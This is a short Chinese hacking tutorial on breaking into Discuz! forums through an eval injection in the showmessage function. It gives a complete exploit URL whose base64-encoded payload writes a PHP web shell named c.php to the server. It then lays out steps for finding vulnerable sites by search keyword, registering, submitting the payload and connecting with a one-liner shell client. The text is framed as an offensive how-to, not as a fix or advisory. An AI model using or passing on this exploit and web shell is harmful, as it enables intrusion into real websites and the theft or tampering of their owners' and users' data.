入侵DZ论坛教程-黑客技术
showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。 漏洞利用: showmessage函数里$vars = explode(':', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。 产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。Discuz! 7.1以下版本也均不受影响。 漏洞利用代码: misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}} 运行此代码会生成一个c.php,代码为1,然后一句话客户端连接。 开始: 1.搜索关键词 2.注册新用户 3.提交利用代码 这样就表示成功了,生成一个c.php 4.用一句话客户端连接传Shell